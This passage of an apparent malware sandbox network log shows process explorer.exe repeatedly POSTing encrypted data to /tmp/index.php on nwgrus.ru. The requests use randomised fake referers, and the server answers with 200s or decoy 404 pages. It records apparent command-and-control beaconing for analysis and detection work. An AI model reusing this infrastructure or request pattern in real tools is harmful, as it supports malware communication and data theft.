                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.549932119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:49.474919081 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://rscdgmrjlxccyebn.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 121
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:49.474951029 CEST121OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 6c 4c a4 8e
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vulLqL'E>jeDB4e
                              Oct 12, 2024 20:07:50.949657917 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:50 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.549943119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:50.957179070 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://jdrsrpxnderfeln.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 326
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:50.957180023 CEST326OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 04 6b 2c 90 f5 76 0b 75 72 02 e9 a4
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vur[`|/z[u9%GwdFNLti2]i?13,?CN"oJU;^&uvLX,X~S&[f
                              Oct 12, 2024 20:07:52.436352968 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:52 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.549954119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:52.444674969 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://letknxuqhdcyc.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 120
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:52.444685936 CEST120OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 05 6b 2c 90 f5 76 0b 75 4f 5c d1 f9
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuO\Qjn~f^~zJ|7o
                              Oct 12, 2024 20:07:53.920020103 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:53 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.549964119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:53.929517984 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://wkvsglvqmchooeii.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 274
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:53.929550886 CEST274OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1a 6b 2c 90 f5 76 0b 75 6f 34 cf ea
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuo4L\fmv{H/>w>3jhvL_XFrk@Ne^(NwvLa5?=yw!>Je*%OKl0x|L%
                              Oct 12, 2024 20:07:55.414083958 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:55 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.549972119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:55.423439026 CEST280OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://liwpdohaxncmk.org/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 124
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:55.423453093 CEST124OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1b 6b 2c 90 f5 76 0b 75 5c 4b ac 8f
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu\K`vSrzwC(p
                              Oct 12, 2024 20:07:56.903420925 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:56 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.549983119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:56.910952091 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://brtyhhcwxjs.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 224
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:56.910976887 CEST224OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 18 6b 2c 90 f5 76 0b 75 4b 3a ef ff
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuK:Q8ept\OGLpE{JYJt@)^LH}Q<~;Y:GRW-4mzxl
                              Oct 12, 2024 20:07:58.598740101 CEST137INHTTP/1.1 200 OK
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:58 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.549993119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:07:58.610378981 CEST279OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://ndcrdrvnqscc.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 262
                              Host: nwgrus.ru
                              Oct 12, 2024 20:07:58.610402107 CEST262OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 19 6b 2c 90 f5 76 0b 75 7d 4e e0 fd
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vu}NHR@[|u,n7G~\#>FC\=+TM%n]N23t\I %}d18Rk(,Fc[v}\#0Mw
                              Oct 12, 2024 20:08:00.089637995 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:07:59 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.549998119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:00.097592115 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://bsujsjkqxtjctly.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 207
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:00.097647905 CEST207OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1e 6b 2c 90 f5 76 0b 75 4b 54 e5 ad
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuKTe*rp%oK<`.4o9;BhtA_'Dn)FdnLO|1"w-lDzB-^
                              Oct 12, 2024 20:08:01.634527922 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:01 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.549999119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:01.771761894 CEST278OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://tkcyaumypyw.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 259
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:01.771790028 CEST259OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1f 6b 2c 90 f5 76 0b 75 53 5a fc 93
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vuSZwESId2HV"5_9CLJ ;MN'sb.LghaOFrQyN:P~t@Yc=WejSe:'{
                              Oct 12, 2024 20:08:03.280970097 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:02 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.550000119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:03.293900013 CEST283OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://vllrmfxybsdiplqu.com/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 140
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:03.293936014 CEST140OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 67 3c a4 96
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA -[k,vug<MHE}}1{%>,TL>ih`n5NTk~
                              Oct 12, 2024 20:08:04.804044962 CEST189INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:04 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
                              Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb
                              Data Ascii: #\6Y9l_m=rA


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.550002119.204.11.2801028C:\Windows\explorer.exe
                              TimestampBytes transferredDirectionData
                              Oct 12, 2024 20:08:06.666564941 CEST282OUTPOST /tmp/index.php HTTP/1.1
                              Connection: Keep-Alive
                              Content-Type: application/x-www-form-urlencoded
                              Accept: */*
                              Referer: http://tamqyjusikafosy.net/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Content-Length: 319
                              Host: nwgrus.ru
                              Oct 12, 2024 20:08:06.666588068 CEST319OUTData Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f5 76 0b 75 30 30 ed 96
                              Data Ascii: ;n&#z}}uGn^/sh$?#1|J7 M@NA ,[k,vu00M]jBytl,h+8(2WXU:e>3o:T*)o;A:{-J(I"ujZG],ITouF9vYg^Z7
                              Oct 12, 2024 20:08:08.140535116 CEST484INHTTP/1.1 404 Not Found
                              Server: nginx/1.26.0
                              Date: Sat, 12 Oct 2024 18:08:07 GMT
                              Content-Type: text/html; charset=utf-8
                              Connection: close
